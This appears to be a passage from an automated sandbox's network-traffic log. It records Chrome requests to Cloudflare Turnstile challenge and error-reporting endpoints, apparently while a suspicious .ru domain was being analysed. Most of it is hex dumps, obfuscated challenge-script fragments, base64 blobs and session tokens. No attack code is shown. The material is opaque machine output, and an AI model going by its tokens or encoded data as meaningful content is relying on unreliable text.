                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 5b 68 77 28 31 33 35 39 29 5d 3d 3d 3d 65 5b 68 77 28 31 34 38 36 29 5d 29 26 26 28 6a 3d 64 5b 68 77 28 31 33 35 39 29 5d 5b 68 77 28 31 32 36 35 29 5d 28 27 5c 6e 27 29 2c 6a 5b 68 77 28 31 32 30 37 29 5d 3e 31 29 26 26 28 6b 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 6c 3d 6a 5b 31 5d 5b 68 77 28 31 31 33 30 29 5d 28 6b 29 2c 6c 26 26 28 67 3d 6c 5b 31 5d 2c 68 3d 65 5b 68 77 28 34 35 33 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 32 5d 2c 31 30 29 2c 69 3d 65 5b 68 77 28 34 35 33 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 33 5d 2c 31 30 29 29 29 3a 66 3d 4a 53 4f 4e 5b 68 77 28 31 33 36 38 29 5d 28 64 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 68 77 28 33 32 34 29 5d 3d 66 2c 6d 5b 68 77 28 31 36 39 35 29
                                                                                      Data Ascii: [hw(1359)]===e[hw(1486)])&&(j=d[hw(1359)][hw(1265)]('\n'),j[hw(1207)]>1)&&(k=/^\s*at\s+(.+):(\d+):(\d+)/,l=j[1][hw(1130)](k),l&&(g=l[1],h=e[hw(453)](parseInt,l[2],10),i=e[hw(453)](parseInt,l[3],10))):f=JSON[hw(1368)](d);return m={},m[hw(324)]=f,m[hw(1695)
                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 29 5d 3d 3d 3d 64 5b 69 6f 28 31 31 38 32 29 5d 26 26 65 5b 69 6f 28 31 33 33 31 29 5d 3d 3d 3d 64 5b 69 6f 28 31 32 32 33 29 5d 3f 64 5b 69 6f 28 31 34 36 36 29 5d 28 64 5b 69 6f 28 31 31 30 31 29 5d 2c 69 6f 28 35 39 32 29 29 3f 64 5b 69 6f 28 33 34 35 29 5d 5b 69 6f 28 31 34 37 31 29 5d 3d 21 21 5b 5d 3a 66 56 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6c 28 29 7d 2c 31 65 33 29 3a 65 26 26 64 5b 69 6f 28 31 30 36 34 29 5d 28 65 5b 69 6f 28 36 33 38 29 5d 2c 64 5b 69 6f 28 31 31 38 32 29 5d 29 26 26 64 5b 69 6f 28 31 35 38 33 29 5d 28 65 5b 69 6f 28 31 33 33 31 29 5d 2c 69 6f 28 32 38 31 29 29 26 26 64 5b 69 6f 28 31 36 36 33 29 5d 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 2c 66 56 29 7d 29 2c 66 58 3d 21 5b 5d 2c 21 66
                                                                                      Data Ascii: )]===d[io(1182)]&&e[io(1331)]===d[io(1223)]?d[io(1466)](d[io(1101)],io(592))?d[io(345)][io(1471)]=!![]:fV=setInterval(function(){gl()},1e3):e&&d[io(1064)](e[io(638)],d[io(1182)])&&d[io(1583)](e[io(1331)],io(281))&&d[io(1663)](clearInterval,fV)}),fX=![],!f


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.1649727104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:11:00 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/737767898:1736393568:3GPIqup9T1FWapXQwnp-3xlwBm1zENfI7dv9-dEVSYI/8ff194a8eb4842ec/D80UIBI30I3Of36qKj9WPaoJyxxHE3GrzrMoeRHCGQo-1736395859-1.1.1.1-Pv8jl5rZqZGTvnlYpWCFoc23AbuyGb6.n9iv_w8ItRvXVrbpcXAyO7Xb.3QVwAJJ HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 3211
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                      CF-Chl-RetryAttempt: 0
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      CF-Challenge: D80UIBI30I3Of36qKj9WPaoJyxxHE3GrzrMoeRHCGQo-1736395859-1.1.1.1-Pv8jl5rZqZGTvnlYpWCFoc23AbuyGb6.n9iv_w8ItRvXVrbpcXAyO7Xb.3QVwAJJ
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Origin: https://challenges.cloudflare.com
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/vjglw/0x4AAAAAAA0rfpQOBx227C7S/auto/fbE/normal/auto/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:00 UTC3211OUTData Raw: 76 5f 38 66 66 31 39 34 61 38 65 62 34 38 34 32 65 63 3d 71 38 54 24 79 24 30 24 5a 24 41 24 6a 74 46 4e 74 46 57 24 74 64 4f 31 55 33 74 52 46 55 67 77 46 78 57 46 25 32 62 69 4b 2b 4e 49 55 46 4f 64 55 31 56 4b 49 30 46 57 46 54 64 74 59 2b 51 46 65 4b 46 31 56 76 59 24 52 56 46 58 24 74 56 59 74 75 35 6b 2b 59 46 39 24 35 35 45 46 32 4b 46 5a 32 46 54 64 46 6c 46 55 4b 2b 78 59 24 2b 59 46 48 6f 54 2b 78 6c 39 34 50 33 46 73 46 6b 30 73 61 6a 50 43 72 72 6d 30 7a 65 4b 55 66 49 46 71 53 7a 30 75 4b 2b 71 71 74 67 52 43 4f 59 38 34 6a 6e 44 76 68 50 41 47 6a 54 4b 54 6d 71 57 65 68 50 52 77 46 46 6d 74 46 2b 61 76 78 63 35 38 73 33 46 35 4b 2b 6e 46 35 65 63 46 74 35 63 24 74 7a 50 59 4b 2b 57 47 72 46 46 73 45 33 4d 65 69 2b 6a 31 37 24 45 46 4f 71 6e
                                                                                      Data Ascii: v_8ff194a8eb4842ec=q8T$y$0$Z$A$jtFNtFW$tdO1U3tRFUgwFxWF%2biK+NIUFOdU1VKI0FWFTdtY+QFeKF1VvY$RVFX$tVYtu5k+YF9$55EF2KFZ2FTdFlFUK+xY$+YFHoT+xl94P3FsFk0sajPCrrm0zeKUfIFqSz0uK+qqtgRCOY84jnDvhPAGjTKTmqWehPRwFFmtF+avxc58s3F5K+nF5ecFt5c$tzPYK+WGrFFsE3Mei+j17$EFOqn
                                                                                      2025-01-09 04:11:01 UTC759INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:11:01 GMT
                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                      Content-Length: 152824
                                                                                      Connection: close
                                                                                      cf-chl-gen: IiSL3wlM+J+sZ6MLRn/CKg7kGw/s5243+Ggs1d4nITMQi3S1L3ZgHrHJYGyXymV5kCLbzoPbKCsA41DzZwjmgmpFAOUazl5iO9fSKq3U8fj1A3nI55jQCB6ozoS6XHIJo14/8S6031ITXR9++yLRZNl4erDGm8WzEbIzPHWX/QnPf54Wl3oVrh1WKGQvOl1EvcwnfbtAGWx+JQ4nCFrdgxBnZvSPVjN+w44YSnmvYm/Ivn4gDqa0p6zmdsxO6VUwuLxLGYs+37MKYAJ0V28ay3gT78FVCkkWyJIKjRcc5L65xT07wYZbiPGxPGUkLFepvhML+yrdn5dHYEMCywywyyrZeDf5D5ck/BXuPekf21zAUWUJM+Y/U1Z504RXDhizAhlBEyeh2kldfYI4e1EScNPkzZtEy4muhSKe3W2Ov9KgzMKdyV3jf9S7UuCGGvYO7HW0L8mD4clHnxQIfbUVmatLA1DWb8Bl86zjNpl7twXIbRb31LAPS7zQgw==$pAGtyb3JqpIj7dfA
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194b33c358c30-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2025-01-09 04:11:01 UTC610INData Raw: 5a 5a 4a 4d 52 34 2b 59 57 47 4e 79 61 49 5a 38 62 57 35 64 6f 48 74 77 68 5a 43 43 58 36 64 31 64 36 71 6e 58 36 65 68 68 58 6d 4a 62 5a 79 42 67 37 61 76 61 37 53 61 68 5a 4f 72 6e 72 75 34 72 38 4b 75 70 72 4f 2f 69 49 61 6c 76 61 47 73 6d 38 36 2f 67 38 79 79 73 61 36 75 74 74 66 5a 78 39 72 47 76 4d 76 59 31 70 65 36 77 4f 4f 77 78 62 4f 39 74 38 47 6a 76 4d 79 37 35 4b 32 77 32 38 43 39 30 74 2f 45 77 64 6a 59 74 50 76 6e 31 62 62 55 34 4d 2f 69 77 51 58 78 34 39 55 4b 39 39 72 6d 33 4e 73 50 36 63 4d 4e 34 4e 30 41 39 66 50 68 42 50 6a 54 37 39 66 31 47 66 49 6a 2f 51 50 66 48 2f 62 6e 41 50 63 6d 39 79 49 50 46 2f 67 5a 49 41 59 79 4e 69 6e 7a 4e 50 49 6f 39 4f 30 32 47 50 6f 38 4c 6b 45 36 4f 68 5a 47 4b 44 63 6f 4e 43 59 6a 46 79 51 4a 45 41 77
                                                                                      Data Ascii: ZZJMR4+YWGNyaIZ8bW5doHtwhZCCX6d1d6qnX6ehhXmJbZyBg7ava7SahZOrnru4r8KuprO/iIalvaGsm86/g8yysa6uttfZx9rGvMvY1pe6wOOwxbO9t8GjvMy75K2w28C90t/EwdjYtPvn1bbU4M/iwQXx49UK99rm3NsP6cMN4N0A9fPhBPjT79f1GfIj/QPfH/bnAPcm9yIPF/gZIAYyNinzNPIo9O02GPo8LkE6OhZGKDcoNCYjFyQJEAw
                                                                                      2025-01-09 04:11:01 UTC1369INData Raw: 45 39 4f 56 39 54 4b 6c 41 69 51 6a 42 62 58 44 67 37 59 46 74 6f 51 6d 39 42 61 31 4e 62 64 53 64 30 51 45 46 32 4f 56 4e 4d 56 54 56 4a 53 49 42 42 58 56 31 32 51 58 42 6f 68 57 52 31 53 59 6d 4a 68 47 52 4a 6a 47 6c 66 61 45 35 6b 61 6f 32 44 64 6e 5a 6d 65 6f 64 77 63 56 36 41 70 49 61 5a 68 36 6c 66 68 71 79 41 6f 35 6d 73 6d 37 42 38 61 6f 53 67 67 72 52 31 68 61 53 5a 68 5a 6d 65 73 35 57 36 74 72 47 58 75 4d 48 49 6c 48 2b 6a 74 4b 4c 49 78 71 4f 49 79 72 71 6a 72 4a 43 65 79 4c 4f 6d 72 70 72 47 71 4c 6e 48 6d 65 47 73 31 38 33 61 73 64 54 70 32 72 4c 62 77 38 65 67 76 63 2b 38 32 38 66 77 73 62 37 51 78 72 53 31 73 76 50 74 32 4d 6a 65 77 66 6d 36 31 66 33 6d 30 4f 62 4a 77 73 4c 64 42 67 58 59 37 74 45 43 79 75 55 4f 31 65 44 32 32 4f 2f 53 37
                                                                                      Data Ascii: E9OV9TKlAiQjBbXDg7YFtoQm9Ba1NbdSd0QEF2OVNMVTVJSIBBXV12QXBohWR1SYmJhGRJjGlfaE5kao2DdnZmeodwcV6ApIaZh6lfhqyAo5msm7B8aoSggrR1haSZhZmes5W6trGXuMHIlH+jtKLIxqOIyrqjrJCeyLOmrprGqLnHmeGs183asdTp2rLbw8egvc+828fwsb7QxrS1svPt2Mjewfm61f3m0ObJwsLdBgXY7tECyuUO1eD22O/S7
                                                                                      2025-01-09 04:11:01 UTC1369INData Raw: 30 58 53 49 5a 52 6b 64 48 57 30 67 72 51 55 35 76 4d 46 4e 52 52 6e 52 67 55 6d 46 76 52 48 64 52 58 6e 45 39 4f 33 52 62 64 30 4a 33 55 33 43 48 57 47 4a 2f 68 6c 56 62 65 49 32 4e 54 70 53 4a 6b 32 4f 41 6c 56 46 74 6c 59 79 47 6d 33 36 56 65 4a 31 78 66 47 4f 63 64 58 43 5a 67 49 65 67 59 36 57 44 69 4b 6d 47 6a 59 4a 72 72 59 6d 51 73 59 36 4d 69 6e 4f 31 6c 70 69 35 6c 70 65 53 65 37 32 69 6e 4c 32 44 69 61 62 4c 77 49 6d 6b 78 63 75 53 72 74 53 6d 78 36 7a 4e 32 4b 72 56 31 4a 36 37 76 71 37 55 77 62 54 46 75 72 2b 35 33 37 37 43 75 36 7a 46 34 71 6a 64 30 73 76 4d 76 2b 76 31 31 4f 58 4a 74 73 7a 31 74 4c 62 55 41 72 32 36 31 66 7a 77 34 66 55 44 34 2f 76 73 37 41 7a 6f 34 2b 4c 72 37 77 30 58 43 78 51 4a 36 4f 63 4d 43 50 73 65 46 67 45 55 49 68
                                                                                      Data Ascii: 0XSIZRkdHW0grQU5vMFNRRnRgUmFvRHdRXnE9O3Rbd0J3U3CHWGJ/hlVbeI2NTpSJk2OAlVFtlYyGm36VeJ1xfGOcdXCZgIegY6WDiKmGjYJrrYmQsY6MinO1lpi5lpeSe72inL2DiabLwImkxcuSrtSmx6zN2KrV1J67vq7UwbTFur+5377Cu6zF4qjd0svMv+v11OXJtsz1tLbUAr261fzw4fUD4/vs7Azo4+Lr7w0XCxQJ6OcMCPseFgEUIh
                                                                                      2025-01-09 04:11:01 UTC1369INData Raw: 5a 7a 52 4b 61 7a 74 62 4f 31 70 78 50 46 4a 79 4b 54 5a 75 55 47 68 45 57 6e 6f 31 58 48 32 43 56 49 42 46 63 7a 35 69 50 33 4f 4d 69 48 74 75 57 57 42 4e 62 48 78 47 68 35 56 68 6a 70 68 71 68 45 36 50 6c 32 36 53 62 48 69 53 6c 36 52 31 6d 47 68 70 64 71 68 73 69 57 36 69 73 61 43 51 72 34 36 31 67 4c 4f 6c 72 49 4f 74 6e 58 53 59 75 33 69 78 6a 72 69 42 78 70 4b 43 65 6f 4b 41 67 71 44 4f 6d 4a 72 42 6a 4b 4b 6f 6e 64 47 75 6c 4b 36 34 70 73 6a 4e 7a 71 32 70 6d 4e 36 73 75 38 43 38 76 61 2b 38 35 72 50 45 34 2b 4b 70 78 72 2b 77 36 2b 2f 7a 38 65 54 50 34 37 44 44 79 75 33 61 79 4c 66 70 2b 76 7a 66 7a 37 37 4f 35 4d 44 6d 42 4f 44 57 2b 77 4c 4a 35 4d 33 4e 37 76 33 51 34 77 45 58 44 2f 49 51 46 67 7a 72 43 53 44 77 2b 68 67 66 39 66 7a 78 42 4e 2f
                                                                                      Data Ascii: ZzRKaztbO1pxPFJyKTZuUGhEWno1XH2CVIBFcz5iP3OMiHtuWWBNbHxGh5VhjphqhE6Pl26SbHiSl6R1mGhpdqhsiW6isaCQr461gLOlrIOtnXSYu3ixjriBxpKCeoKAgqDOmJrBjKKondGulK64psjNzq2pmN6su8C8va+85rPE4+Kpxr+w6+/z8eTP47DDyu3ayLfp+vzfz77O5MDmBODW+wLJ5M3N7v3Q4wEXD/IQFgzrCSDw+hgf9fzxBN/
                                                                                      2025-01-09 04:11:01 UTC1369INData Raw: 54 39 76 62 7a 35 46 63 45 63 32 4e 31 5a 6e 53 30 39 75 61 45 39 6a 68 46 31 54 56 34 68 67 66 55 4b 4d 64 6d 74 76 66 33 70 6e 58 30 75 4e 6c 47 57 54 6a 56 56 57 62 33 61 50 65 57 31 37 56 35 78 35 62 36 5a 33 6d 34 6d 6e 6f 61 61 6b 70 59 5a 70 6d 72 43 73 69 58 39 72 62 57 32 53 68 35 65 47 6a 61 69 58 64 72 79 7a 76 4c 4b 39 75 38 58 45 71 4c 36 58 76 72 57 63 6d 38 65 76 78 59 72 42 74 4e 47 6a 6a 39 4f 78 6b 4e 53 73 78 5a 75 30 77 61 2b 7a 35 4c 7a 5a 6e 75 6a 53 78 38 76 62 31 73 4f 37 70 75 75 35 70 50 43 30 30 4d 71 33 30 75 6e 78 31 4e 48 65 31 2b 66 34 41 74 41 41 39 64 50 47 39 2f 4c 6e 35 77 62 32 36 77 62 37 2b 65 2f 62 42 4d 2f 30 38 4d 37 6a 79 78 55 4d 46 68 58 7a 31 67 45 57 37 78 6f 47 47 2f 76 7a 43 52 38 41 39 52 59 4e 42 43 38 53
                                                                                      Data Ascii: T9vbz5FcEc2N1ZnS09uaE9jhF1TV4hgfUKMdmtvf3pnX0uNlGWTjVVWb3aPeW17V5x5b6Z3m4mnoaakpYZpmrCsiX9rbW2Sh5eGjaiXdryzvLK9u8XEqL6XvrWcm8evxYrBtNGjj9OxkNSsxZu0wa+z5LzZnujSx8vb1sO7puu5pPC00Mq30unx1NHe1+f4AtAA9dPG9/Ln5wb26wb7+e/bBM/08M7jyxUMFhXz1gEW7xoGG/vzCR8A9RYNBC8S
                                                                                      2025-01-09 04:11:01 UTC1369INData Raw: 51 35 51 31 5a 73 62 6b 59 35 57 46 31 71 64 46 79 44 5a 56 4b 49 63 59 68 34 62 55 6c 64 51 57 52 6d 69 32 32 56 6a 32 46 68 6c 6f 52 73 65 6d 68 58 57 31 78 38 6c 46 70 75 66 49 47 48 6d 49 47 61 61 6f 56 6a 69 48 6d 6b 6a 59 36 6f 6b 33 39 31 6a 70 2b 54 69 62 4b 44 70 62 47 65 71 34 79 32 64 49 47 67 66 63 57 52 6f 4a 57 31 75 36 58 4f 69 71 71 48 6e 71 69 6c 71 4b 44 42 6f 4c 6d 70 31 61 61 6c 78 37 57 77 6e 4c 37 5a 32 4e 61 62 6f 61 53 66 35 4b 53 32 36 74 66 58 34 4f 2f 71 71 4d 33 51 7a 37 54 73 31 64 62 77 32 38 65 7a 36 4f 66 62 30 66 6d 35 78 4e 50 75 38 67 66 39 42 66 77 47 42 4e 38 52 34 63 7a 49 78 65 67 51 35 75 4d 42 46 77 37 6d 38 52 4c 78 48 52 38 69 2b 64 73 43 35 43 59 65 38 69 6e 63 4b 42 73 4b 39 2f 73 4c 4a 68 37 71 4c 79 49 45 37
                                                                                      Data Ascii: Q5Q1ZsbkY5WF1qdFyDZVKIcYh4bUldQWRmi22Vj2FhloRsemhXW1x8lFpufIGHmIGaaoVjiHmkjY6ok391jp+TibKDpbGeq4y2dIGgfcWRoJW1u6XOiqqHnqilqKDBoLmp1aalx7WwnL7Z2NaboaSf5KS26tfX4O/qqM3Qz7Ts1dbw28ez6Ofb0fm5xNPu8gf9BfwGBN8R4czIxegQ5uMBFw7m8RLxHR8i+dsC5CYe8incKBsK9/sLJh7qLyIE7
                                                                                      2025-01-09 04:11:01 UTC1369INData Raw: 4d 57 31 46 73 63 45 31 69 59 46 5a 5a 55 57 64 68 65 34 31 6a 51 55 39 2f 67 6f 74 64 67 57 64 71 61 46 5a 58 5a 59 61 64 69 6d 31 57 6b 6e 56 73 62 58 4f 66 59 34 61 61 69 35 74 71 62 49 71 66 67 71 4b 46 61 35 46 30 74 61 75 43 75 5a 43 33 71 72 47 6d 64 70 71 38 74 58 32 52 76 5a 62 45 6b 48 76 4b 76 37 2b 37 6a 62 76 52 70 49 69 6d 30 6f 79 65 7a 70 58 4c 32 4a 4f 35 6e 4e 33 58 71 75 47 34 33 39 50 44 6e 74 7a 6a 74 65 50 4d 32 4c 62 57 33 38 50 76 7a 66 4f 7a 30 4e 50 57 2b 63 65 35 7a 73 79 36 75 38 7a 67 34 4d 79 36 33 67 48 35 2b 4e 55 42 78 51 6e 55 34 64 33 63 45 63 50 37 79 2b 6a 6a 33 78 63 54 47 66 50 54 2b 77 6a 57 48 74 6b 50 34 66 4d 51 37 67 6a 36 2b 50 6b 68 42 4f 63 4e 43 65 59 41 43 43 30 69 36 2f 51 67 46 67 6b 71 39 44 55 52 47 54
                                                                                      Data Ascii: MW1FscE1iYFZZUWdhe41jQU9/gotdgWdqaFZXZYadim1WknVsbXOfY4aai5tqbIqfgqKFa5F0tauCuZC3qrGmdpq8tX2RvZbEkHvKv7+7jbvRpIim0oyezpXL2JO5nN3XquG439PDntzjtePM2LbW38PvzfOz0NPW+ce5zsy6u8zg4My63gH5+NUBxQnU4d3cEcP7y+jj3xcTGfPT+wjWHtkP4fMQ7gj6+PkhBOcNCeYACC0i6/QgFgkq9DURGT
                                                                                      2025-01-09 04:11:01 UTC1369INData Raw: 64 48 5a 45 51 47 71 41 52 49 57 47 56 34 4f 51 5a 34 64 51 67 32 5a 6f 6d 47 4a 6f 57 59 68 7a 56 4a 78 30 6f 58 78 61 6c 57 42 32 64 6e 4f 56 67 6d 68 2f 6c 61 53 63 6f 61 4a 37 69 72 4e 30 67 59 57 44 70 49 52 7a 70 62 61 34 6c 59 74 37 6c 70 44 43 68 5a 2b 6f 6c 34 4f 64 76 34 6a 4c 70 34 79 78 7a 4c 7a 41 70 39 4b 6a 74 74 62 57 77 38 76 46 6c 4b 69 59 7a 70 36 55 72 74 33 45 77 64 75 77 79 5a 7a 6a 78 4d 6e 4f 70 63 79 39 7a 38 4c 50 77 64 57 2f 7a 4e 44 54 31 74 48 61 36 39 50 71 41 50 7a 30 2f 66 72 43 7a 2b 54 6c 42 67 30 48 31 2f 72 6e 78 67 4c 51 2f 4d 73 51 39 66 48 52 30 65 62 54 32 2f 6e 5a 48 75 67 5a 37 68 67 41 48 2f 73 6a 4a 42 37 39 4b 53 77 65 2b 69 51 41 4d 2f 6f 6e 42 6a 59 31 4b 77 55 71 4a 54 55 4e 2b 67 70 41 46 68 4d 4e 49 78 30
                                                                                      Data Ascii: dHZEQGqARIWGV4OQZ4dQg2ZomGJoWYhzVJx0oXxalWB2dnOVgmh/laScoaJ7irN0gYWDpIRzpba4lYt7lpDChZ+ol4Odv4jLp4yxzLzAp9KjttbWw8vFlKiYzp6Urt3EwduwyZzjxMnOpcy9z8LPwdW/zNDT1tHa69PqAPz0/frCz+TlBg0H1/rnxgLQ/MsQ9fHR0ebT2/nZHugZ7hgAH/sjJB79KSwe+iQAM/onBjY1KwUqJTUN+gpAFhMNIx0
                                                                                      2025-01-09 04:11:01 UTC1369INData Raw: 55 53 46 66 33 42 4b 63 33 39 6c 55 57 46 4a 5a 49 69 47 55 5a 71 49 63 58 78 58 6d 33 46 72 63 71 42 78 6b 57 4b 54 67 58 53 74 70 33 6c 36 65 6f 6c 6f 6e 6d 35 2b 72 6d 32 32 70 49 32 59 63 37 65 4e 6d 58 71 73 6a 5a 32 52 75 62 47 62 6f 73 54 43 77 37 71 4a 75 4b 61 39 79 70 75 37 72 38 65 72 72 37 57 52 71 36 4f 54 74 35 53 57 76 4d 32 36 33 71 4b 33 78 4d 61 7a 76 4c 37 6b 76 4c 33 4f 79 73 47 74 78 61 58 49 34 63 58 58 39 74 44 52 75 37 4c 77 79 76 33 7a 7a 76 72 38 30 2f 33 44 33 50 44 38 78 67 33 73 32 2f 6e 68 38 41 62 6e 43 50 4d 47 41 2f 4c 4f 43 65 37 36 47 74 7a 74 2b 64 67 4e 39 65 77 6a 37 69 44 77 33 79 55 43 39 65 4d 44 41 67 76 2b 4c 53 77 65 4d 2f 55 67 49 76 49 53 4c 52 4d 37 4b 52 49 62 50 7a 30 4f 48 68 49 36 4d 68 59 6a 52 55 4e 45
                                                                                      Data Ascii: USFf3BKc39lUWFJZIiGUZqIcXxXm3FrcqBxkWKTgXStp3l6eolonm5+rm22pI2Yc7eNmXqsjZ2RubGbosTCw7qJuKa9ypu7r8err7WRq6OTt5SWvM263qK3xMazvL7kvL3OysGtxaXI4cXX9tDRu7Lwyv3zzvr80/3D3PD8xg3s2/nh8AbnCPMGA/LOCe76Gtzt+dgN9ewj7iDw3yUC9eMDAgv+LSweM/UgIvISLRM7KRIbPz0OHhI6MhYjRUNE


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.164972835.190.80.14437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:11:01 UTC534OUTOPTIONS /report/v4?s=Oqxao9qQCC6II3KSlsZF6aku7OXU7mAi7dckWx91GM1OzUBm%2BxhhaPQi1WEK5sfBwduW0IdgDScmXau4zMP3rcOKzsn0L4GT9p6MF7DOc7FbimndZWzzcruaKpB%2B6A%3D%3D HTTP/1.1
                                                                                      Host: a.nel.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      Origin: https://lap.gnoqwwhpwe.ru
                                                                                      Access-Control-Request-Method: POST
                                                                                      Access-Control-Request-Headers: content-type
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:01 UTC336INHTTP/1.1 200 OK
                                                                                      Content-Length: 0
                                                                                      access-control-max-age: 86400
                                                                                      access-control-allow-methods: OPTIONS, POST
                                                                                      access-control-allow-origin: *
                                                                                      access-control-allow-headers: content-length, content-type
                                                                                      date: Thu, 09 Jan 2025 04:11:00 GMT
                                                                                      Via: 1.1 google
                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                      Connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.2.164973135.190.80.14437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:11:01 UTC474OUTPOST /report/v4?s=Oqxao9qQCC6II3KSlsZF6aku7OXU7mAi7dckWx91GM1OzUBm%2BxhhaPQi1WEK5sfBwduW0IdgDScmXau4zMP3rcOKzsn0L4GT9p6MF7DOc7FbimndZWzzcruaKpB%2B6A%3D%3D HTTP/1.1
                                                                                      Host: a.nel.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 428
                                                                                      Content-Type: application/reports+json
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:01 UTC428OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 32 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 61 70 2e 67 6e 6f 71 77 77 68 70 77 65 2e 72 75 2f 33 61 65 4b 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22
                                                                                      Data Ascii: [{"age":0,"body":{"elapsed_time":423,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://lap.gnoqwwhpwe.ru/3aeK/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error","
                                                                                      2025-01-09 04:11:01 UTC168INHTTP/1.1 200 OK
                                                                                      Content-Length: 0
                                                                                      date: Thu, 09 Jan 2025 04:11:01 GMT
                                                                                      Via: 1.1 google
                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                      Connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.1649732104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:11:01 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/737767898:1736393568:3GPIqup9T1FWapXQwnp-3xlwBm1zENfI7dv9-dEVSYI/8ff194a8eb4842ec/D80UIBI30I3Of36qKj9WPaoJyxxHE3GrzrMoeRHCGQo-1736395859-1.1.1.1-Pv8jl5rZqZGTvnlYpWCFoc23AbuyGb6.n9iv_w8ItRvXVrbpcXAyO7Xb.3QVwAJJ HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:02 UTC379INHTTP/1.1 404 Not Found
                                                                                      Date: Thu, 09 Jan 2025 04:11:01 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 7
                                                                                      Connection: close
                                                                                      cf-chl-out: ENd+kOHH79grn85wxOSDLUnQO9AJsyZ6W9g=$PeDYsQjyfRO/+RIi
                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      Server: cloudflare
